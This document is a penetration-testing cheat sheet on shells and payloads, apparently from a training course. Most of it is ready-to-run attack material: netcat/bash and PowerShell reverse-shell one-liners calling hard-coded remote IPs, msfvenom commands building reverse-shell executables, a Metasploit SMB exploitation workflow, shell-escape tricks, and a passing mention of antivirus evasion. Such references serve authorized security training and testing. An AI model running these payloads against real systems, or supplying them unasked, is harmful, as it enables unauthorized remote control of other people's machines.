Shells & Payloads: Payloads Overview

Payloads Overview

Types of Payloads

• Staged Payloads

  • Sends initial stage first, then downloads main payload

  • Better for environments with sufficient memory

  • Example naming: windows/meterpreter/reverse_tcp

• Stageless Payloads

  • Entire payload sent at once

  • Ideal for low-bandwidth environments

  • Example naming: windows/meterpreter_reverse_tcp

Essential Payload Commands

Netcat/Bash Reverse Shell

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f

PowerShell Reverse Shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()"

MSFvenom Payload Generation

• List Available Payloads

  Copy

  msfvenom -l payloads

• Linux Payload Creation

  Copy

  msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f elf > payload.elf

• Windows Payload Creation

  Copy

  msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe

Windows System Infiltration

Fingerprinting Windows Hosts

• TTL Check via Ping

  Copy

  ping <target_ip>    # Look for TTL=128 or 32

• Nmap OS Detection

  Copy

  sudo nmap -v -O <target_ip>
  sudo nmap -v -A <target_ip>    # Aggressive scan

Key Windows Ports

• 139, 445: NetBIOS/SMB

• 135: MSRPC

• 443: HTTPS

Common Windows Payloads

1. DLLs: For privilege escalation and UAC bypass

2. Batch Files (.bat): Automation scripts

3. VBScript (.vbs): Client-side automation

4. MSI Files: Installation packages

5. PowerShell Scripts: System automation and exploitation

Metasploit Attack Workflow

# Start Metasploit
sudo msfconsole

# Search for exploit
search smb

# Configure exploit
use <exploit_number>
set RHOSTS <target_ip>
set SHARE ADMIN$
set SMBPass <password>
set SMBUser <username>
set LHOST <attacker_ip>

# Execute
exploit

Linux System Infiltration

Pre-Exploitation Checklist

• Identify Linux distribution

• Check available shells and programming languages

• Determine system role (web server, database, etc.)

• Look for application-specific vulnerabilities

• Search for known CVEs

Interactive Shell Spawning Methods

• Python TTY Shell

  Copy

  python -c 'import pty; pty.spawn("/bin/sh")'

• Basic Shell Spawning

  Copy

  /bin/sh -i
  perl -e 'exec "/bin/sh";'
  ruby -e 'exec "/bin/sh";'
  lua -e 'os.execute("/bin/sh")'
  awk 'BEGIN {system("/bin/sh")}'

• VIM Shell Escape

  Copy

  vim -c ':!/bin/sh'
  # Or in VIM:
  :set shell=/bin/sh
  :shell

Permission Checks

# File permissions
ls -la <path/to/file>

# Sudo permissions
sudo -l

Best Practices

Pre-Exploitation

• Always perform thorough reconnaissance

• Document all findings and attempted exploits

• Verify target scope and permissions

Post-Exploitation

• Maintain access securely

• Document all changes made to the system

• Clean up after testing is complete

Security Considerations

• Use staged payloads for better reliability

• Consider antivirus evasion techniques

• Always use secure channels for communication